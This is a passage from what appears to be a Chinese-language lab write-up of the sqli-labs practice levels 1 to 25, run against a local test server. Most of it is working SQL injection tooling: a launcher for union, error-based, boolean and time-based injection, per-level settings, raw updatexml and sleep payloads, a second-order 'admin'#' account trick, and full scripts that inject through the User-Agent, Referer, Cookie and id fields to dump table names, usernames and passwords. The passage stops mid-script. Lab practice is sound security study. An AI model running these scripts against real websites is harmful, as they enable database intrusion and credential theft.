226
            if response >= 2:
227
                name += chr(mid)
228
                break
229
            data = {
230
                "uname": f"""-1{SYMBOL} or ascii(substring({type},{pos},1))<{mid}#""",
231
                "passwd": ""
232
            }
233
            response = RequestTime.post(URL, data) or 2
234
            if response >= 2:
235
                high = mid - 1
236
            else:
237
                low = mid + 1
238
    return name
239

240

241
def post(url, symbol):
242
    global URL, SYMBOL
243
    URL = url
244
    SYMBOL = symbol
245

246
    logging.info(f"开始对 {url} 进行注入...")
247
    logging.info("爆破数据库名...")
248
    type = """database()"""
249
    db_length = post_length(type)
250
    db_name = post_name(db_length, type)
251
    logging.info("成功获取数据库名...")
252
    print("[+] 成功获取数据库名：", db_name)
253
    logging.info(f"开始爆破 {db_name} 库的数据表...")
254
    type = f"""(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='{db_name}')"""
255
    tb_num = post_num(type)
256
    tb_list = []
257
    for i in range(tb_num):
258
        type = f"""(SELECT table_name FROM information_schema.tables WHERE table_schema='{db_name}' LIMIT {i},1)"""
259
        length = post_length(type)
260
        tb_name = post_name(length, type)
261
        tb_list.append(tb_name)
262
    logging.info("成功获取所有数据表名...")
263
    print("[+] 发现数据表：", tb_list)
264
    while True:
265
        tb_index = input("[*] 请输入想要获取详细信息的数据表的索引：")
266
        try:
267
            tb_name = tb_list[int(tb_index)]
268
            print(f"[+] 已选择数据表: {tb_name}")
269
            break
270
        except ValueError:
271
            print("[-] 输入无效！请输入数字格式的索引...")
272
        except IndexError:
273
            print(f"[-] 索引越界！请输入 0 到 {len(tb_list) - 1} 之间的数字...")
274
        except Exception:
275
            print("[-] 发生未知错误，请重试...")
276
            return None
277
    logging.info(f"开始爆破 {tb_name} 的数据列...")
278
    type = f"""(SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}')"""
279
    col_num = post_num(type)
280
    col_list = []
281
    for i in range(col_num):
282
        type = f"""(SELECT column_name FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}' LIMIT {i},1)"""
283
        length = post_length(type)
284
        col_name = post_name(length, type)
285
        col_list.append(col_name)
286
    logging.info("成功获取所有数据列名...")
287
    print("[+] 发现数据列：", col_list)
288
    while True:
289
        col_index = input("[*] 请输入想要获取详细信息的数据列的索引：")
290
        try:
291
            col_name = col_list[int(col_index)]
292
            print(f"[+] 已选择数据列: {col_name}")
293
            break
294
        except ValueError:
295
            print("[-] 输入无效！请输入数字格式的索引...")
296
        except IndexError:
297
            print(f"[-] 索引越界！请输入 0 到 {len(col_list) - 1} 之间的数字...")
298
        except Exception:
299
            print("[-] 发生未知错误，请重试...")
300
            return None
301
    logging.info(f"开始爆破 {col_name} 列的值...")
302
    type = f"""(SELECT COUNT(*) FROM {db_name}.{tb_name})"""
303
    value_num = post_num(type)
304
    value_list = []
305
    for i in range(value_num):
306
        type = f"""(SELECT {col_name} FROM {db_name}.{tb_name} LIMIT {i},1)"""
307
        length = post_length(type)
308
        value = post_name(length, type)
309
        value_list.append(value)
310
    return value_list

1
import logging
2

3
import UnionInject
4
import BoolInject
5
import TimeInject
6
import ErrorInject
7
import Config
8

9

10
logging.basicConfig(
11
    filename="python/SQL注入/Log/main.log",
12
    filemode="a",
13
    format="%(asctime)s - %(levelname)s - %(message)s",
14
    level=logging.INFO,
15
    encoding="UTF-8"
16
)
17

18
def main(tool, method):
19
    match tool:
20
        case "Union":
21
            if method == "GET":
22
                username, password = UnionInject.get(URL, SYMBOL, RULE) or (None, None)
23
                print("")
24
                print("[+] 获取的数据库中的用户名为：")
25
                print(username)
26
                print("")
27
                print("[+] 获取的数据库中的密码为：")
28
                print(password)
29
            else:
30
                username, password = UnionInject.post(URL, SYMBOL, RULE) or (None, None)
31
                print("")
32
                print("[+] 获取的数据库中的用户名为：")
33
                print(username)
34
                print("")
35
                print("[+] 获取的数据库中的密码为：")
36
                print(password)
37
        case "Error":
38
            if method == "GET":
39
                username, password = ErrorInject.get(URL, SYMBOL, RULE) or (None, None)
40
                print("")
41
                print("[+] 获取的数据库中的用户名为：")
42
                print(username)
43
                print("")
44
                print("[+] 获取的数据库中的密码为：")
45
                print(password)
46
            else:
47
                username, password = ErrorInject.post(URL, SYMBOL, RULE) or (None, None)
48
                print("")
49
                print("[+] 获取的数据库中的用户名为：")
50
                print(username)
51
                print("")
52
                print("[+] 获取的数据库中的密码为：")
53
                print(password)
54
        case "Bool":
55
            if method == "GET":
56
                result = BoolInject.get(URL, SYMBOL, RULE)
57
                print("")
58
                print("[+] 你想要获取的信息为：")
59
                print(result)
60
            else:
61
                result = BoolInject.post(URL, SYMBOL, RULE)
62
                print("")
63
                print("[+] 你想要获取的信息为：")
64
                print(result)
65
        case "Time":
66
            if method == "GET":
67
                result = TimeInject.get(URL, SYMBOL)
68
                print("[+] 你想要获取的信息为：")
69
                print(result)
70
            else:
71
                result = TimeInject.post(URL, SYMBOL)
72
                print("[+] 你想要获取的信息为：")
73
                print(result)
74

75

76

77
if __name__ == "__main__":
78
    URL = Config.URL
79
    RULE = Config.RULE
80
    SYMBOL = Config.SYMBOL
81

82

83
    tool = ["Union", "Error", "Bool", "Time"]
84
    print("[*] 可选择的操作：", tool)
85
    index = input("[*] 请输入想要进行的操作的索引：")
86
    while True:
87
        try:
88
            tool = tool[int(index)]
89
            print(f"[+] 已选择数据表: {tool}")
90
            break
91
        except ValueError:
92
            print("[-] 输入无效！请输入数字格式的索引...")
93
        except IndexError:
94
            print(f"[-] 索引越界！请输入 0 到 {len(tool) - 1} 之间的数字...")
95

96
    method = ["GET", "POST"]
97
    print("[*] 可选择的方法：", method)
98
    index = input("[*] 请输入想要进行的操作的索引：")
99
    while True:
100
        try:
101
            method = method[int(index)]
102
            print(f"[+] 已选择数据表: {method}")
103
            break
104
        except ValueError:
105
            print("[-] 输入无效！请输入数字格式的索引...")
106
        except IndexError:
107
            print(f"[-] 索引越界！请输入 0 到 {len(method) - 1} 之间的数字...")
108

109
    main(tool, method)

使用也比较简单吧……先去 Config.py 中修改 URL、SYMBOL 和 RULE，然后在终端中选择合适的注入方式与请求方式就行了。
因为不太会用 sys 库接收参数，所以选择了这样一个在 Config.py 中统一修改参数的方式。至于优化，以后再说吧……
有了这个 Exp，通关靶场前 16 关非常 ez，所以我的 wp 也就快速略过了

Less-1#

先测试：传入 id=1' 1768043224392 单引号闭合。再传入 id=1，得到数据解析的 Xpath 规则： 1768043314918

接下来，在脚本中修改：

1
URL = "http://127.0.0.1/sql/Less-1/"
2
RULE = "/html/body/div/font[2]/font/text()"
3
SYMBOL = "\'"

通过刚刚的观察，我们发现服务器会回显内容，也会回显错误，因此注入方法可以选择联合注入，也可以选择报错注入。当然，不追求时间的话，什么条件下都可以选择时间盲注
运行脚本，获得信息： 1768043730799

Less-2#

直接修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-2/"
2
RULE = "/html/body/div/font[2]/font/text()"
3
SYMBOL = ""

1768043920335

Less-3#

依旧修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-3/"
2
RULE = "/html/body/div/font[2]/font/text()"
3
SYMBOL = "\')"

1768044055949

Less-4#

修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-4/"
2
RULE = "/html/body/div/font[2]/font/text()"
3
SYMBOL = "\")"

1768044873996

Less-5#

修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-5/"
2
RULE = "/html/body/div/font[2]/font/text()"
3
SYMBOL = "\'"

有具体的报错信息，因此可以选择报错注入；同样有正确与否的回显，因此可以选择布尔盲注。当然，也可以选择时间盲注 1768045337666

Less-6#

修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-6/"
2
RULE = "/html/body/div/font[2]/font/text()"
3
SYMBOL = "\""

1768045467336

Less-7#

修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-7/"
2
RULE = "/html/body/div/font[2]/font/text()"
3
SYMBOL = "\'))"

没有详细的报错信息了，因此只能选择布尔盲注或者时间盲注 1768045825524

Less-8#

修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-8/"
2
RULE = "/html/body/div/font[2]/font/text()"
3
SYMBOL = "\'"

1768045979473

Less-9#

无论怎样修改页面都不会改变了，因此只能使用时间盲注了。先注入：

1
id=-1' or if(1=1,sleep(2),1)--+

发现页面卡顿了很久，因此使用的是单引号闭合

修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-9/"
2
RULE = "/html/body/div/font[2]/font/text()"
3
SYMBOL = "\'"

Less-10#

依旧时间盲注。修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-10/"
2
RULE = "/html/body/div/font[2]/font/text()"
3
SYMBOL = "\""

Less-11#

变成 POST 表单的形式了 1768195017141

尝试在 uname 字段注入 1768195103635

行，直接用脚本。修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-11/"
2
RULE = "/html/body/div[3]/font/font/font/text()"
3
SYMBOL = "\'"

成功获取信息 1768195257992

Less-12#

修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-12/"
2
RULE = "/html/body/div[3]/font/font/font/text()"
3
SYMBOL = "\")"

成功获取信息 1768195419272

Less-13#

闭合符号是 ')，但是没有回显 1768195603948

在测试闭合符时发现了会报错详细信息，因此使用报错注入。修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-13/"
2
RULE = "/html/body/div[3]/font/font/text()"
3
SYMBOL = "\")"

成功获取信息 1768195958551

Less-14#

没有报错信息，只有在正确与否的时候图片会不一样，因此使用布尔盲注
修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-14/"
2
RULE = "/html/body/div[3]/font/font/img/@src"
3
SYMBOL = "\""

成功获取信息 1768196542321

Less-15#

依旧布尔盲注，修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-15/"
2
RULE = "/html/body/div[3]/font/font/img/@src"
3
SYMBOL = "\'"

成功获取数据 1768196684943

Less-16#

修改 Config.py

1
URL = "http://127.0.0.1/sql/Less-16/"
2
RULE = "/html/body/div[3]/font/font/img/@src"
3
SYMBOL = "\")"

成功获取数据 1768196811456

Less-17#

1768050877630

uname 无论传入什么都会回显这个页面，因此判断注入点不在此处。尝试爆破 uname，发现传入 admin 可以通过： 1768051014934

因此，uname 传入 admin，尝试在 passwd 进行注入： 1768051058984

单引号闭合，且有详细的报错信息，因此使用报错注入

1
爆数据库名：
2
' or updatexml(1,concat(0x7e,database(),0x7e),1)#
3

4
爆数据表名：
5
' or updatexml(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='security'),0x7e),1)#
6

7
爆列名：
8
' or updatexml(1,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema='security' AND table_name='users'),0x7e),1)#
9

10
爆用户名：
11
' or updatexml(1,concat(0x7e,(SELECT group_concat(username) FROM security.users),0x7e),1)#

打到这就出问题了，因为题目中这句的源码是这样的

1
"UPDATE users SET password = '$passwd' WHERE username='$row1'"

在 SQL 语句中，UPDATE users 后面的语句中不能出现 FROM users 的语句，因此此处再想用报错注入已经不行了……
尝试查找了一些资料，使用 SQLmap，但是也没有打通……先鸽一会，如果有大佬可以解决这个问题，请教教我，谢谢！

Less-18#

1768139634761

提醒 IP 地址，第一个想到的是 X-Forwarded-For，尝试修改后没东西。随后尝试在 uname 和 passwd 上注入，都没有注入点。因此只能被迫尝试爆破

1
uname=admin&passwd=admin

成功获得回显： 1768140054676

回显 User-Agent，因此尝试在这里注入 1768140446842

单引号加括号闭合，有详细报错信息，但是现在报错列数不够简单测试一下，发现是 3 列 1768141001279

随后报错注入就行了

修改了一下原来的报错注入的脚本

1
import request
2
import logging
3

4

5
logging.basicConfig(
6
    format="%(asctime)s - %(levelname)s - %(message)s",
7
    level=logging.INFO
8
)
9

10
def main(url, rule):
11
    logging.info(f"开始对 {url} 进行注入...")
12
    data = {
13
        "uname": """admin""",
14
        "passwd": "admin"
15
    }
16
    header = {
17
        "User-Agent": f"""1',updatexml(1,concat(0x7e,database(),0x7e),1),3)#"""
18
    }
19
    logging.info(f"第一次注入内容为 {header['User-Agent']}...")
20
    response = request.post(url, rule, data=data, headers=header)
21
    if response == None:
22
        logging.error(f"出现错误...")
23
        return None
24
    try:
25
        db_name = response[0].split(':')[1][3:-2]
26
    except Exception as e:
27
        logging.exception("第一次注入语句出现错误...")
28
        return response
29
    header = {
30
        "User-Agent": f"""1',updatexml(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='{db_name}'),0x7e),1),3)#"""
31
    }
32
    logging.info(f"第二次注入内容为 {header['User-Agent']} ...")
33
    response = request.post(url, rule, data=data, headers=header)
34
    if response == None:
35
        logging.error(f"出现错误...")
36
        return None
37
    try:
38
        tb_list = response[0].split(':')[1][3:-2].split(',')
39
    except Exception as e:
40
        logging.exception("第二次注入语句出现错误...")
41
        return response
42
    print("[+] 发现数据表：", tb_list)
43
    while True:
44
        tb_index = input("[*] 请输入想要获取详细信息的数据表的索引：")
45
        try:
46
            tb_name = tb_list[int(tb_index)]
47
            print(f"[+] 已选择数据表: {tb_name}")
48
            break
49
        except ValueError:
50
            print("[-] 输入无效！请输入数字格式的索引...")
51
        except IndexError:
52
            print(f"[-] 索引越界！请输入 0 到 {len(tb_list) - 1} 之间的数字...")
53
        except Exception:
54
            print("[-] 发生未知错误，请重试...")
55
            return None
56
    header = {
57
        "User-Agent": f"""1',updatexml(1,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}'),0x7e),1),3)#"""
58
    }
59
    logging.info(f"第三次注入内容为 {header['User-Agent']}...")
60
    response = request.post(url, rule, data=data, headers=header)
61
    if response == None:
62
        logging.error(f"出现错误...")
63
        return None
64
    try:
65
        col_list = response[0].split(':')[1][3:-2].split(',')
66
    except Exception as e:
67
        logging.exception("第三次注入语句出现错误...")
68
        return response
69
    print("[+] 发现数据列：", col_list)
70
    col_name_1 = col_list[1]
71
    logging.info(f"开始第四次注入...")
72
    p = 1
73
    tmp = "1"
74
    username = ""
75
    while tmp:
76
        header = {
77
            "User-Agent": f"""1',updatexml(1,concat(0x7e,(SELECT mid(group_concat({col_name_1}),{p},{p+29}) FROM {db_name}.{tb_name}),0x7e),1),3)#"""
78
        }
79
        response = request.post(url, rule, data=data, headers=header)
80
        if response == None:
81
            logging.error(f"出现错误...")
82
            return None
83
        try:
84
            tmp = response[0].split(':')[1][3:-2]
85
        except Exception as e:
86
            logging.exception("第四次注入语句出现错误...")
87
            return response
88
        username += tmp
89
        p += 30
90
    username = username.split(',')
91
    col_name_2 = col_list[2]
92
    logging.info("开始第五次注入...")
93
    p = 1
94
    tmp = "1"
95
    password = ""
96
    while tmp:
97
        header = {
98
            "User-Agent": f"""1',updatexml(1,concat(0x7e,(SELECT mid(group_concat({col_name_2}),{p},{p+29}) FROM {db_name}.{tb_name}),0x7e),1),3)#"""
99
        }
100
        response = request.post(url, rule, data=data, headers=header)
101
        if response == None:
102
            logging.error(f"出现错误...")
103
            return None
104
        try:
105
            tmp = response[0].split(':')[1][3:-2]
106
        except Exception as e:
107
            logging.exception("第五次注入语句出现错误...")
108
            return response
109
        password += tmp
110
        p += 30
111
    password = password.split(',')
112
    return username, password
113

114
if __name__ == "__main__":
115
    url = "http://127.0.0.1/sql/Less-18/"
116
    rule = "/html/body/div[3]/font/text()[3]"
117

118
    username, password = main(url, rule) or (None, None)
119
    print()
120
    print(username)
121
    print()
122
    print(password)

也能爆出想要的信息

Less-19#

依旧显示 IP，有了上一关的经验，先传 uname=admin&passwd=admin 试试，回显 1768143225928

行，修改 Referer 字段试试 1768143394793

行，再测一下，发现是 2 列
那就再改一下脚本

1
import request
2
import logging
3

4

5
logging.basicConfig(
6
    format="%(asctime)s - %(levelname)s - %(message)s",
7
    level=logging.INFO
8
)
9

10
def main(url, rule):
11
    logging.info(f"开始对 {url} 进行注入...")
12
    data = {
13
        "uname": """admin""",
14
        "passwd": "admin"
15
    }
16
    header = {
17
        "Referer": f"""1',updatexml(1,concat(0x7e,database(),0x7e),1))#"""
18
    }
19
    logging.info(f"第一次注入内容为 {header['Referer']}...")
20
    response = request.post(url, rule, data=data, headers=header)
21
    if response == None:
22
        logging.error(f"出现错误...")
23
        return None
24
    try:
25
        db_name = response[0].split(':')[1][3:-2]
26
    except Exception as e:
27
        logging.exception("第一次注入语句出现错误...")
28
        return response
29
    header = {
30
        "Referer": f"""1',updatexml(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='{db_name}'),0x7e),1))#"""
31
    }
32
    logging.info(f"第二次注入内容为 {header['Referer']} ...")
33
    response = request.post(url, rule, data=data, headers=header)
34
    if response == None:
35
        logging.error(f"出现错误...")
36
        return None
37
    try:
38
        tb_list = response[0].split(':')[1][3:-2].split(',')
39
    except Exception as e:
40
        logging.exception("第二次注入语句出现错误...")
41
        return response
42
    print("[+] 发现数据表：", tb_list)
43
    while True:
44
        tb_index = input("[*] 请输入想要获取详细信息的数据表的索引：")
45
        try:
46
            tb_name = tb_list[int(tb_index)]
47
            print(f"[+] 已选择数据表: {tb_name}")
48
            break
49
        except ValueError:
50
            print("[-] 输入无效！请输入数字格式的索引...")
51
        except IndexError:
52
            print(f"[-] 索引越界！请输入 0 到 {len(tb_list) - 1} 之间的数字...")
53
        except Exception:
54
            print("[-] 发生未知错误，请重试...")
55
            return None
56
    header = {
57
        "Referer": f"""1',updatexml(1,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}'),0x7e),1))#"""
58
    }
59
    logging.info(f"第三次注入内容为 {header['Referer']}...")
60
    response = request.post(url, rule, data=data, headers=header)
61
    if response == None:
62
        logging.error(f"出现错误...")
63
        return None
64
    try:
65
        col_list = response[0].split(':')[1][3:-2].split(',')
66
    except Exception as e:
67
        logging.exception("第三次注入语句出现错误...")
68
        return response
69
    print("[+] 发现数据列：", col_list)
70
    col_name_1 = col_list[1]
71
    logging.info(f"开始第四次注入...")
72
    p = 1
73
    tmp = "1"
74
    username = ""
75
    while tmp:
76
        header = {
77
            "Referer": f"""1',updatexml(1,concat(0x7e,(SELECT mid(group_concat({col_name_1}),{p},{p+29}) FROM {db_name}.{tb_name}),0x7e),1))#"""
78
        }
79
        response = request.post(url, rule, data=data, headers=header)
80
        if response == None:
81
            logging.error(f"出现错误...")
82
            return None
83
        try:
84
            tmp = response[0].split(':')[1][3:-2]
85
        except Exception as e:
86
            logging.exception("第四次注入语句出现错误...")
87
            return response
88
        username += tmp
89
        p += 30
90
    username = username.split(',')
91
    col_name_2 = col_list[2]
92
    logging.info("开始第五次注入...")
93
    p = 1
94
    tmp = "1"
95
    password = ""
96
    while tmp:
97
        header = {
98
            "Referer": f"""1',updatexml(1,concat(0x7e,(SELECT mid(group_concat({col_name_2}),{p},{p+29}) FROM {db_name}.{tb_name}),0x7e),1))#"""
99
        }
100
        response = request.post(url, rule, data=data, headers=header)
101
        if response == None:
102
            logging.error(f"出现错误...")
103
            return None
104
        try:
105
            tmp = response[0].split(':')[1][3:-2]
106
        except Exception as e:
107
            logging.exception("第五次注入语句出现错误...")
108
            return response
109
        password += tmp
110
        p += 30
111
    password = password.split(',')
112
    return username, password
113

114
if __name__ == "__main__":
115
    url = "http://127.0.0.1/sql/Less-19/"
116
    rule = "/html/body/div[3]/font/text()[3]"
117

118
    username, password = main(url, rule) or (None, None)
119
    print()
120
    print(username)
121
    print()
122
    print(password)

成功获取信息

Less-20#

依旧测试，发现 uname 和 passwd 都没有注入点。再次爆破，发现 uname 和 passwd 都为 admin 1768143848557

回显了很多东西，先尝试修改 User-Agent 1768143913561

没啥反应。再看 Cookie 1768143990751

报错了，那就是说注入点在 Cookie 中
再次修改脚本

1
import request
2
import logging
3

4

5
logging.basicConfig(
6
    format="%(asctime)s - %(levelname)s - %(message)s",
7
    level=logging.INFO
8
)
9

10
def main(url, rule):
11
    logging.info(f"开始对 {url} 进行注入...")
12
    data = {
13
        "uname": """admin""",
14
        "passwd": "admin"
15
    }
16
    header = {
17
        "Cookie": f"""uname=1' or updatexml(1,concat(0x7e,database(),0x7e),1)#"""
18
    }
19
    logging.info(f"第一次注入内容为 {header['Cookie']}...")
20
    response = request.post(url, rule, data=data, headers=header)
21
    if response == None:
22
        logging.error(f"出现错误...")
23
        return None
24
    try:
25
        db_name = response[0].split(':')[2][3:-2]
26
    except Exception as e:
27
        logging.exception("第一次注入语句出现错误...")
28
        return response
29
    header = {
30
        "Cookie": f"""uname=1' or updatexml(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='{db_name}'),0x7e),1)#"""
31
    }
32
    logging.info(f"第二次注入内容为 {header['Cookie']} ...")
33
    response = request.post(url, rule, data=data, headers=header)
34
    if response == None:
35
        logging.error(f"出现错误...")
36
        return None
37
    try:
38
        tb_list = response[0].split(':')[2][3:-2].split(',')
39
    except Exception as e:
40
        logging.exception("第二次注入语句出现错误...")
41
        return response
42
    print("[+] 发现数据表：", tb_list)
43
    while True:
44
        tb_index = input("[*] 请输入想要获取详细信息的数据表的索引：")
45
        try:
46
            tb_name = tb_list[int(tb_index)]
47
            print(f"[+] 已选择数据表: {tb_name}")
48
            break
49
        except ValueError:
50
            print("[-] 输入无效！请输入数字格式的索引...")
51
        except IndexError:
52
            print(f"[-] 索引越界！请输入 0 到 {len(tb_list) - 1} 之间的数字...")
53
        except Exception:
54
            print("[-] 发生未知错误，请重试...")
55
            return None
56
    header = {
57
        "Cookie": f"""uname=1' or updatexml(1,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}'),0x7e),1)#"""
58
    }
59
    logging.info(f"第三次注入内容为 {header['Cookie']}...")
60
    response = request.post(url, rule, data=data, headers=header)
61
    if response == None:
62
        logging.error(f"出现错误...")
63
        return None
64
    try:
65
        col_list = response[0].split(':')[2][3:-2].split(',')
66
    except Exception as e:
67
        logging.exception("第三次注入语句出现错误...")
68
        return response
69
    print("[+] 发现数据列：", col_list)
70
    col_name_1 = col_list[1]
71
    logging.info(f"开始第四次注入...")
72
    p = 1
73
    tmp = "1"
74
    username = ""
75
    while tmp:
76
        header = {
77
            "Cookie": f"""uname=1' or updatexml(1,concat(0x7e,(SELECT mid(group_concat({col_name_1}),{p},{p+29}) FROM {db_name}.{tb_name}),0x7e),1)#"""
78
        }
79
        response = request.post(url, rule, data=data, headers=header)
80
        if response == None:
81
            logging.error(f"出现错误...")
82
            return None
83
        try:
84
            tmp = response[0].split(':')[2][3:-2]
85
        except Exception as e:
86
            logging.exception("第四次注入语句出现错误...")
87
            return response
88
        username += tmp
89
        p += 30
90
    username = username.split(',')
91
    col_name_2 = col_list[2]
92
    logging.info("开始第五次注入...")
93
    p = 1
94
    tmp = "1"
95
    password = ""
96
    while tmp:
97
        header = {
98
            "Cookie": f"""uname=1' or updatexml(1,concat(0x7e,(SELECT mid(group_concat({col_name_2}),{p},{p+29}) FROM {db_name}.{tb_name}),0x7e),1)#"""
99
        }
100
        response = request.post(url, rule, data=data, headers=header)
101
        if response == None:
102
            logging.error(f"出现错误...")
103
            return None
104
        try:
105
            tmp = response[0].split(':')[2][3:-2]
106
        except Exception as e:
107
            logging.exception("第五次注入语句出现错误...")
108
            return response
109
        password += tmp
110
        p += 30
111
    password = password.split(',')
112
    return username, password
113

114
if __name__ == "__main__":
115
    url = "http://127.0.0.1/sql/Less-20/"
116
    rule = "/html/body/center/b/font[3]/text()[2]"
117

118
    username, password = main(url, rule) or (None, None)
119
    print()
120
    print(username)
121
    print()
122
    print(password)

成功获取数据

事后又去看了眼源码，这里使用的是 SELECT 语句，因此联合注入也是可以的，但是我懒得改脚本了……

Less-21#

依旧尝试 admin，成功回显 1768144602843

被 Base64 编码了，尝试注入试试 1768144786579

把 payload Base64 编码就行了
懒得改脚本了，反正就用 Base64 库编码一下就行了……

Less-22#

和上一关一样，只是改成用双引号闭合……

Less-23#

依旧 id 测试 1768145090915

注释符没用了，猜测是被 WAF 了，那使用 or '1'='1 的格式就能闭合 SQL 语句了 1768145214152

依旧改脚本

1
import request
2
import logging
3

4
def main(url, symbol, rule):
5
    logging.info(f"开始对 {url} 进行注入...")
6
    param = {
7
        "id": f"""-1{symbol} UNION SELECT 1,database(),group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() AND {symbol}1{symbol}={symbol}1"""
8
    }
9
    logging.info(f"第一次注入内容为 {param['id']}...")
10
    response = request.get(url, rule, param)
11
    if response == None:
12
        logging.error(f"出现错误...")
13
        return None
14
    try:
15
        db_name = response[0].split(':')[1]
16
        tb_list = response[1].split(':')[1].split(',')
17
    except Exception as e:
18
        logging.exception("第一次注入语句出现错误...")
19
        return response
20
    print("[+] 发现数据表：", tb_list)
21
    while True:
22
        tb_index = input("[*] 请输入想要获取详细信息的数据表的索引：")
23
        try:
24
            tb_name = tb_list[int(tb_index)]
25
            print(f"[+] 已选择数据表: {tb_name}")
26
            break
27
        except ValueError:
28
            print("[-] 输入无效！请输入数字格式的索引...")
29
        except IndexError:
30
            print(f"[-] 索引越界！请输入 0 到 {len(tb_list) - 1} 之间的数字...")
31
        except Exception:
32
            print("[-] 发生未知错误，请重试...")
33
            return None
34
    param = {
35
        "id": f"""-1{symbol} UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='{db_name}' AND table_name='{tb_name}' AND {symbol}1{symbol}={symbol}1"""
36
    }
37
    logging.info(f"第二次注入内容为 {param['id']}...")
38
    response = request.get(url, rule, param)
39
    if response == None:
40
        logging.error(f"出现错误...")
41
        return None
42
    try:
43
        col_list = response[0].split(':')[1].split(',')
44
    except Exception as e:
45
        logging.exception("第二次注入语句出现错误...")
46
        return response
47
    print("[+] 发现数据列：", col_list)
48
    col_name_1 = col_list[1]
49
    col_name_2 = col_list[2]
50
    param = {
51
        "id": f"""-1{symbol} UNION SELECT 1,group_concat({col_name_1}),group_concat({col_name_2}) FROM {db_name}.{tb_name} WHERE {symbol}1{symbol}={symbol}1"""
52
    }
53
    logging.info(f"第三次注入内容为 {param['id']}...")
54
    response = request.get(url, rule, param)
55
    if response == None:
56
        logging.error(f"出现错误...")
57
        return None
58
    try:
59
        username = response[0].split(':')[1].split(',')
60
        password = response[1].split(':')[1].split(',')
61
    except Exception as e:
62
        logging.exception("第三次注入语句出现错误...")
63
        return response
64
    return username, password
65

66
if __name__ == "__main__":
67
    url = "http://127.0.0.1/sql/Less-23/index.php"
68
    symbol = "\'"
69
    rule = "/html/body/div/font[2]/font/text()"
70

71
    username, password = main(url, symbol, rule) or (None, None)
72
    print("\n")
73
    print(username)
74
    print()
75
    print(password)

成功获得信息

Less-24#

发现了注册页面 1768145800458

1768145987450

尝试直接修改 admin 的密码，回显 1768145863886

尝试闭合语句并加一个注释符，也不行
没想法了，看看源码

1
$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";

1
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

源码中的逻辑漏洞挺多，但是单纯从 SQL 注入来说，这里应该是二次注入，所以在注册新用户时

1
Desired Username: admin'#
2
Password: 任意密码

然后登录

1
Username: admin'#
2
Password: 刚刚注册的密码

然后重置密码

1
Current Password: 注册的密码
2
New Password: 任意新密码

然后点 reset，这时候才会触发 pass_change.php，更新 admin 的密码。最后只需要用刚刚更新过的密码就可以登录 admin 账户了
但是这有什么用呢？不明白……
其他的地方都被严格限制了，并不能进行注入。能以 admin 身份登入也确实不错了

Less-25#

提示挺明显的，过滤了 AND 和 OR 1768197046685

尝试联合注入，发现成功回显 1768197211289

去修改一下联合注入的 payload，不用 AND

1
import request
2
import logging
3

4
def main(url, symbol, rule):
5
    logging.info(f"开始对 {url} 进行注入...")
6
    param = {
7
        "id": f"""-1{symbol} UNION SELECT 1,database(),group_concat(table_name) FROM infoorrmation_schema.tables WHERE table_schema=database()-- """
8
    }
9
    logging.info(f"第一次注入内容为 {param['id']}...")
10
    response = request.get(url, rule, param)
11
    if response == None:
12
        logging.error(f"出现错误...")
13
        return None
14
    try:
15
        db_name = response[0].split(':')[1]
16
        tb_list = response[1].split(':')[1].split(',')
17
    except Exception as e:
18
        logging.exception("第一次注入语句出现错误...")
19
        return response
20
    print("[+] 发现数据表：", tb_list)
21
    while True:
22
        tb_index = input("[*] 请输入想要获取详细信息的数据表的索引：")
23
        try:
24
            tb_name = tb_list[int(tb_index)]
25
            print(f"[+] 已选择数据表: {tb_name}")
26
            break
27
        except ValueError:
28
            print("[-] 输入无效！请输入数字格式的索引...")
29
        except IndexError:
30
            print(f"[-] 索引越界！请输入 0 到 {len(tb_list) - 1} 之间的数字...")
31
        except Exception:
32
            print("[-] 发生未知错误，请重试...")
33
            return None
34
    param = {
35
        "id": f"""-1{symbol} UNION SELECT 1,group_concat(column_name),3 FROM infoorrmation_schema.columns WHERE table_name='{tb_name}'-- """
36
    }
37
    logging.info(f"第二次注入内容为 {param['id']}...")
38
    response = request.get(url, rule, param)
39
    if response == None:
40
        logging.error(f"出现错误...")
41
        return None
42
    try:
43
        col_list = response[0].split(':')[1].split(',')
44
    except Exception as e:
45
        logging.exception("第二次注入语句出现错误...")
46
        return response
47
    print("[+] 发现数据列：", col_list)
48
    col_name_1 = col_list[4]
49
    param = {
50
        "id": f"""-1{symbol} UNION SELECT 1,group_concat({col_name_1}),group_concat(passwoorrd) FROM {db_name}.{tb_name}-- """
51
    }
52
    logging.info(f"第三次注入内容为 {param['id']}...")
53
    response = request.get(url, rule, param)
54
    if response == None:
55
        logging.error(f"出现错误...")
56
        return None
57
    try:
58
        username = response[0].split(':')[1].split(',')
59
        password = response[1].split(':')[1].split(',')
60
    except Exception as e:
61
